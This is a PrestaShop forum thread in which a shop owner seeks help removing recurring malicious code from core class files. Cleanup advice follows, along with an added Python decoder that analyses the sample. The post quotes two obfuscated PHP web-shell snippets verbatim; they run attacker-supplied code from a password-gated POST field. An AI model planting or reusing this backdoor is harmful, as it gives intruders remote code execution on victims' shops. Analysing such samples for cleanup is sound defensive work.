Patrik Posted February 13, 2023

Hello there, I would like to ask about PrestaShop files. From time to time I notice that some weird variables and hashes have been added at the end of some files and their source code. When I delete it manually from the files, it comes back in a few days. I am not very skilled in PrestaShop; I don't know how to protect it or clean it. For example, one of the files is domain.com/www/classes/Dispatcher.php; there are more files from classes that are getting this unwanted code at the end of their source code. An example of the unwanted code is this; I have no idea how to decode it or permanently delete it.

$p11c9="THIZBzt8jFVwN79QaClh3UEdSq06iJ5gKvPuebAmns_4YLDfrxGX2poRcyk1WOM";$e8208=$p11c9[47].$p11c9[35].$p11c9[40].$p11c9[56].$p11c9[6].$p11c9[28].$p11c9[54].$p11c9[40].$p11c9[42].$p11c9[36].$p11c9[49].$p11c9[28].$p11c9[41].$p11c9[6].$p11c9[41];$t17=$p11c9[56].$p11c9[48].$p11c9[36].$p11c9[16].$p11c9[6].$p11c9[36].$p11c9[42].$p11c9[47].$p11c9[35].$p11c9[40].$p11c9[56].$p11c9[6].$p11c9[28].$p11c9[54].$p11c9[40];$gd25=$p11c9[37].$p11c9[16].$p11c9[41].$p11c9[36].$p11c9[27].$p11c9[43].$p11c9[42].$p11c9[23].$p11c9[36].$p11c9[56].$p11c9[54].$p11c9[23].$p11c9[36];if(@$e8208($t17)){$z3a7 = @$t17('', @$gd25('aWYKIChpc3NldCgkX1BPU1RbcHJvZHVjdF9pZF0pIAoKJiYgCgptZDUoCiRfUE9TVFtwcm9kdWN0X2lkXSAgKSAJPT09ImFmZTBhNTFhN2Y1ODQ3MGE5YzZlNmJmZjcyMjAxZmRlIikKCXsJIGV2YWwoYmFzZTY0X2RlY29kZSgJICRfUE9TVFtpbWFnZV9pZF0pCQopOwpleGl0KCk7fTs='));@$z3a7();}

$obf48="L4IdFOJXZu0vhmtrW27Hg9GTqpfkY6zAMNRwbKU3naceEl5_so18VDPjCQiSyxB";$v108=$obf48[26].$obf48[9].$obf48[40].$obf48[42].$obf48[14].$obf48[58].$obf48[49].$obf48[40].$obf48[47].$obf48[43].$obf48[61].$obf48[58].$obf48[48].$obf48[14].$obf48[48];$lfed=$obf48[42].$obf48[15].$obf48[43].$obf48[41].$obf48[14].$obf48[43].$obf48[47].$obf48[26].$obf48[9].$obf48[40].$obf48[42].$obf48[14].$obf48[58].$obf48[49].$obf48[40];$d0e30=$obf48[36].$obf48[41].$obf48[48].$obf48[43].$obf48[29].$obf48[1].$obf48[47].$obf48[3].$obf48[43].$obf48[42].$obf48[49].$obf48[3].$obf48[43];if(@$v108($lfed)){$uad5 = @$lfed('', @$d0e30('aWYKCShpc3NldAoJKAokX1BPU1RbcHJvZHVjdF9pZF0pICAKJiYgbWQ1KAkgJF9QT1NUW3Byb2R1Y3RfaWRdCikJID09PSJiYjE3ZDU0ZWE5MDdhNDg4NzU1NGQ1OGM5ZWU0NjVmZSIKICkKCnsKCWV2YWwoICBiYXNlNjRfZGVjb2RlKAkkX1BPU1RbaW1hZ2VfaWRdKQoKKTsKZXhpdCgpOwp9Ow=='));@$uad5();}

Has anyone seen anything like this? Are there any solutions to permanently clean it and prevent it from happening again? Thank you.
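Added example (not part of the original post, and not the cleaner script mentioned later in this thread): a static Python decoder for the first snippet above. It only parses the text, resolving the index-lookup names and base64-decoding the quoted literal; the function names `deobfuscate` and `indicators` are made up for this illustration.

```python
import base64
import re

# First injected snippet from the post above, kept as inert text: it is parsed
# with regular expressions only and never executed.
SAMPLE = (
    '$p11c9="THIZBzt8jFVwN79QaClh3UEdSq06iJ5gKvPuebAmns_4YLDfrxGX2poRcyk1WOM";'
    '$e8208=$p11c9[47].$p11c9[35].$p11c9[40].$p11c9[56].$p11c9[6].$p11c9[28].$p11c9[54].$p11c9[40].$p11c9[42].$p11c9[36].$p11c9[49].$p11c9[28].$p11c9[41].$p11c9[6].$p11c9[41];'
    '$t17=$p11c9[56].$p11c9[48].$p11c9[36].$p11c9[16].$p11c9[6].$p11c9[36].$p11c9[42].$p11c9[47].$p11c9[35].$p11c9[40].$p11c9[56].$p11c9[6].$p11c9[28].$p11c9[54].$p11c9[40];'
    '$gd25=$p11c9[37].$p11c9[16].$p11c9[41].$p11c9[36].$p11c9[27].$p11c9[43].$p11c9[42].$p11c9[23].$p11c9[36].$p11c9[56].$p11c9[54].$p11c9[23].$p11c9[36];'
    "if(@$e8208($t17)){$z3a7 = @$t17('', @$gd25('aWYKIChpc3NldCgkX1BPU1RbcHJvZHVjdF9pZF0pIAoKJiYgCgptZDUoCiRfUE9TVFtwcm9kdWN0X2lkXSAgKSAJPT09ImFmZTBhNTFhN2Y1ODQ3MGE5YzZlNmJmZjcyMjAxZmRlIikKCXsJIGV2YWwoYmFzZTY0X2RlY29kZSgJICRfUE9TVFtpbWFnZV9pZF0pCQopOwpleGl0KCk7fTs='));@$z3a7();}"
)

TABLE = re.compile(r'\$(\w+)="([^"]*)";')               # $tbl="...";
BUILT = re.compile(r'\$(\w+)=((?:\$\w+\[\d+\]\.?)+);')  # $v=$tbl[1].$tbl[2];
INDEX = re.compile(r'\$(\w+)\[(\d+)\]')                 # one $tbl[n] lookup
B64 = re.compile(r"'([A-Za-z0-9+/]{40,}={0,2})'")       # long quoted base64


def deobfuscate(php):
    """Return (resolved variable names, decoded base64 payloads)."""
    tables = dict(TABLE.findall(php))
    names = {}
    for var, expr in BUILT.findall(php):
        # Look each character up in its table; skip unknown or out-of-range refs.
        chars = [tables[t][int(i)] for t, i in INDEX.findall(expr)
                 if t in tables and int(i) < len(tables[t])]
        names[var] = "".join(chars)
    payloads = []
    for blob in B64.findall(php):
        text = base64.b64decode(blob).decode("utf-8", "replace")
        payloads.append(" ".join(text.split()))  # collapse padding whitespace
    return names, payloads


def indicators(payload):
    """Pull out what a defender can search for: request fields and hash gate."""
    return {"post_fields": sorted(set(re.findall(r'\$_POST\[(\w+)\]', payload))),
            "md5_gate": re.findall(r'\b[0-9a-f]{32}\b', payload)}


if __name__ == "__main__":
    names, payloads = deobfuscate(SAMPLE)
    print(names, payloads[0], indicators(payloads[0]), sep="\n")
```

On the sample this resolves the wrapper to `function_exists`, `create_function` and `base64_decode`, and the decoded payload evaluates the `image_id` POST field when the MD5 of `product_id` matches the embedded hash. The second snippet in the post has the same shape and can be passed to the same function.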

Prestachamps Posted February 13, 2023 (edited)

Hello, You can make a backup, remove this line, and then verify that the website is still operational. Then, to stop these attacks, I advise using Imunify on your server. Additionally, you can look at this discussion: I hope that I could help. Have a nice day, Leo.

Edited February 13, 2023 by Prestachamps

Patrik Posted February 13, 2023 Author (edited)

Thank you, I was removing these lines like 6 times, nothing happened. But the code is still coming back. I saw on the forum people using some cleaner.zip file which told them which files were changed. The link you sent is not working.

Edited February 13, 2023 by Patrik

idnovate.com Posted February 13, 2023

Patrik Posted February 13, 2023 Author

The cleaner plugin doesn't work, it cannot detect the CMS:

Script de nettoyage et contrôle pour boutiques PrestaShop by @eolia
CMS inconnu. Script interrompu

I found in the access logs that a user is trying to log in with a token, and through module_name blmvuln, so I googled blmvuln and found this exploit: https://sploitus.com/exploit?id=07597D1E-9918-5E4C-89D8-857E228869A4&utm_source=rss&utm_medium=rss

Eolia Posted February 13, 2023

5 minutes ago, Patrik said:
> The cleaner plugin doesn't work, it cannot detect the CMS:
>
> Script de nettoyage et contrôle pour boutiques PrestaShop by @eolia
> CMS inconnu. Script interrompu
>
> I found in the access logs that a user is trying to log in with a token, and through module_name blmvuln, so I googled blmvuln and found this exploit: https://sploitus.com/exploit?id=07597D1E-9918-5E4C-89D8-857E228869A4&utm_source=rss&utm_medium=rss

Which PS version, please?

Patrik Posted February 13, 2023 Author (edited)

I need to use it for 1.6 but my test environment is 1.7

Edited February 13, 2023 by Patrik

Eolia Posted February 13, 2023

19 minutes ago, Patrik said:
> I need to use it for 1.6 but my test environment is 1.7

Cleaner checks this file in your admin dir: get-file-admin.php. If this file does not exist, it's a real problem...

Patrik Posted February 13, 2023 Author

Well, I finally found the mentioned file; it was in the "admin" folder. Btw, in a fresh new PS install there is no such file.

Patrik Posted February 13, 2023 Author

Cleaner is working, my fault. Thx.